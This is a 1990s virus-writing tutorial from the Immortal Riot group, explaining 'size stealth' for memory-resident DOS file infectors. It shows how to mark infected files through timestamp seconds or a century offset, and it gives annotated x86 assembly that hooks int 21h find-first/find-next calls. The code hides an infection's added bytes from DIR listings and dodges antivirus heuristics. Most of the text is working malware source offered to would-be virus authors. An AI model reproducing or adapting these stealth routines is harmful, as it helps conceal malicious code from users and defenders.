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2021-04-15 11:31:59 -07:00
% Size-stealth by Blonde %
Here's a *messy* tutorial written ages ago by Blonde. It contained
a few errors, which is pretty bad for a tutorial :-), I erased one
or two, but if you still find a few bugs, deal with it.
A few things could be commented better, such as the determination-
technique for fcb-types, however, I've now fixed that up, so be happy :).
Maybe there is no reason for a semi-stealth tutorial since pretty much
about everyone just rips another viruses stealth-routine, alters the
infection-check and plugs it in... So it's for those people or for the
ones who can write a memory resident infector, but have no clue of how
to stealth the size-increase the virus causes when infecting (Except
for the 00-fillers, of course), enjoy.
- The Unforgiven.
- Size stealth using FCB and Handles -
Written by Blonde/Immortal Riot
Many new resident viruses include atleast some stealth features, well
almost all if hiding from dos's mem.com is considered as stealth ;).
But in this article I'll go through the basic size stealth. Some of you
(or most of you ;)) already know how to write a size-stealth routine,
but there is always someone who doesn't. I remember when I tried to
write it without a clue on how to do it...
I guess the concept is quite clear ;). It's basically hiding the files
increase in size when it's infected by our virus. To do that you have to
be resident of course, but you can't do anything about that, except make
the virus a fast replicator ;)
Okey, well first of all you have to mark the infected file somehow. Most
writers choose to mark the seconds in the time stamp, since they're
seldomly used. You *can* of course open the file and check your jmp or
id-marker, but doing it that way would slow down the filesearch in
a large directory a lot. Thats why its easier(and better) mark the time
You can mark the file as you like, but this is how I generally do. Just
before you're about to restore the time/date stamp of the file just alter
CX to hold it. Preferably without altering the hour/min's...
;CX=time stamp...
and cl,11100000b ;this will zero-out the seconds field since
;it's the last 5 bits.
or cl,01110b ;this set this files seconds field to 01110b
;=14 (28 seconds) = our specific stealth-marker.
This is good because it's easy to check if the file was marked by us,
simply get the timestamp in ax and do an AND al,00011111b followed by a
XOR al,01110b to get al=0 IF the file was marked by us...
We could also mark the time-stamp with the century method. The century
method is as simple as the seconds method... just add another 100 years
to the year field and remove them in the resident stealth routine, this
method is good if you've got a mbr infector or something like it,
because if the virus isn't in the memory this method will generate
TBAV's 'T'-flag and probably trigger F-Prot too. But on the other
hand, no program will be stealthed without being infected... adding
another century could be done like this...
;DX=date stamp
add dh,c8h ;this add 100 years to the yearfield it's
;year-1980=bit 15-9 in dx...
;0c8h = 100 shl 1, since it's shifted left
To detect this at stealth time simply do a cmp dh,0c8h and if it's
below then it can't be infected by us... simple right? BUT you'll have
to stealth the date too so just do a sub dh,0c8h when you stealth the size...
this might have been a bit fuzzy, if so stick to
the seconds method ;).
Say we've marked all our infected files by setting the seconds field
to 01110b How do we hide the size then? And from what do we hide them?
Well we want to hide them from file searches, atleast thats what I'm
teaching you ;). And DOS mainly provide two ways to search for files,
via FCB or via file handles. The file handles have been recommended to
use since DOS version 2+ or something, yet DIR still uses the FCB so
today we'll have to hide from both of them to get enough coverage, but
who knows we might be able too lose those FCB's in a future since DOS
v7.0+ shall use handles ;)
We simply add 11h/12h (FCB's) and 4e/4f (Handles) to our interrupt 21h
handler. Yes, you'll have to hook int 21h by yourself ;)
It can look something like this:
cmp ah,11h
jz stealth_fcb
cmp ah,12h
jz stealth_fcb
cmp ah,4eh
jz stealth_handle
cmp ah,4fh
jz stealth_handle
jmp dword ptr cs:[Oldint21h]
11h and 4Eh is basicly find first and 12h/4Fh is find next, that
should be a problem... make the 11h/12h point to one routine and
4Eh/4Fh to another.
We'll start with the FCB routine since it's a bit more complicated...
Stealth_Fcb: ;jmp here from int-hook...
push cs
call org21h ;This will fake a call to the real int 21h
;because else we would not know what to steath.
;on return ds:dx point to unopened FCB
or al,al ;since 11h/12h doesn't set carry flag on error
jnz stealth_error ;we'll check that the error code=0=no-error
;or al,al is a smaller variant of cmp al,0 btw!
push ax bx es ;save them because we'll alter them
mov ah,51h ;get current psp, ah=62h is also ok.
int 21h ;returns segment of current psp in bx
mov es,bx ;es=bx=current psp
cmp bx,es:[16h] ;this is to check if it's DOS calling,
jne dont_stealth ;we does this to not screw up programs like
;chkdsk, this means; we stealth only on 'DIR'
mov bx,dx ;bx=offset to unopened FCB
mov al,ds:[bx] ;At the first offset of an unopened FCB the
;drive is stored if it's *not* an extended fcb
;if it's an extended-fcb, the value it FFh.
;(Everything is extended-fcb nowadays.. )
push ax ;Save AX on the stack (It's FF or 0 )
mov ah,2Fh ;Get current DTA
int 21h ;returns dta to es:bx
pop ax ;Restore AX (Is FF or 0)
inc ax ;By Inc AX, we and cmp for ZERO, we can notice
;if we're dealing with regular or extended FCB
;types. FFh+1=0, so, if it's *not* 0 after we
;increased AX (AX=AX+1), it's not zero, then its
;not an extended-FCB-type either.
jnz regular_fcb
add bx,7h ;If extended, add 7 to bx, this is the ONLY difference
;between extended and regular FCB's, the extended has
;some extra bytes which would fuck up our offset if we
;didn't care...
mov ax,es:[bx+17h] ;get time stamp from the DTA (es:bx pointer, 17h=adress)
and al,00011111b ;kill everything but seconds field
xor al,01110b ;xor with our timestamp
jnz dont_stealth ;if al isn't zero the file wasn't marked by us!
;check your logic book if you don't understand XOR!
cmp word ptr es:[bx+1Dh],vsize+mininfectsize
ja stealth ;this is obvious, if it is large enough to be
;infect, stealth it...
cmp word ptr es:[bx+1fh],0
je dont_stealth ;since COM-files cannot be over 64k, don't stealth
;files which are so large.
sub word ptr es:[bx+1Dh],vsize ;stealth it!
;sbb word ptr es:[bx+1Fh],0 ;No need to stealth high-word for
;COM-infectors only, Blonde :-).
pop es bx ax ;restore these
iret ;return to the caller with or
;without stealth
I guess this could be hard to get at the first view... but it's easy.
First of all you fake an int call because you want something to
stealth... then you get the current psp, no problems there... You check
to see if it's dos calling. Then you move the byte at PSP:0 into al.
That's because you must check if it's an extended FCB. The difference
between regular and extended is that an extended FCB also includes some
DOS RESERVED areas which one must skip to get to the information you
want... A fact is that the regular fcb is almost unused only dos versions
prior to 4 used it. Then you get the address to the DTA, it's returned
in es:bx, next check if it's an extended FCB and add 7 to bx if it is...
(thats because of the reserved areas) then one stores the timestamp from
the dta in ax.
You then must and/xor al to see if your marker is there... if it isn't you
bail. If it's there you check if the filesize isn't too small, note that
you first have to check if the low word is larger than the virus if it is
stealth it. If it's smaller then check the high word (ie. how many 64k
block is it?), if it's zero then it's impossible to infect the file...
If all thats a match we subtract the virus-size from the filesize at
es:[bx+1Dh] (low word) and es:[bx+1fh] (high word)
Finally we pop es/bx/ax and iret to the calling routine.
And now to the handle routine, it's simpler than the FCB routine
because all we need is the DTA... but I guess you already knew that ;)
push cs
call org21h ;still fake
jc stealth_error ;we can use this since 4e/4f sets the
;carry flag on error
push ax bx es ;push the flags because they'll be altered by
;the int call
mov ah,2fh
int 21h ;get dta in es:bx
mov ax,es:[bx+16h] ;get time stamp
and al,00011111b
xor al,01110b
jnz dont_stealth ;If not zero, then file is not infected!
cmp word ptr es:[bx+1Ah],vsize+minsize ;check if file is too small?
ja stealth
cmp word ptr es:[bx+1Ch],0
je dont_stealth ;check if file is too large?
sub word ptr es:[bx+1Ah],vsize ;Substract code-lenght
;sbb word ptr es:[bx+1Ch],0 ;Still no need to sub high-word..
pop es bx ax
retf 2 ;return far, pop 2 off stack (cs:ip)
;don't pop flags since they're may be
;altered by int call
The handle-stealth routine should look really familiar ;) It's almost
exactly the same as the FCB routine, but you don't have to bother about
those extended fcbs and stuff, but I'll go through it anyway... but
just on the points that differ from the fcb routine...
The jump if carry can be used instead of that or al,al because 4e/4f
set the carry flag on error...you must also pop the flags just because
of that, the call might alter them in another way...
Also get the dta and timestamp and check if it's yours and so on,
but that shouldn't be a problem, just observe that all offsets change!
We use a retf 2 because we don't want to pop the flags of the stack
since we already done so by ourselfs...
It's possible to smash these routines into one, well nearly.
That can save valueable bytes. I won't bother going thru that here,
but it's basiclly adding 3 to bx to get the right offset when doing the
last part, look at my virus Salamander Four which is included at the end
of this file. It's a com only infector so it'll look a little different
since you don't have to worryabout the high word of the filesize since
comfiles only can be 64kb's long...
I guess this isn't the best explanation you could get, but it's all
you'll get from me ;). I'll be happy to answer any questions
concerning this matter or any other. I'm reachable at TWL/HNS or via
Nukenet and I'm even on IRC sometimes...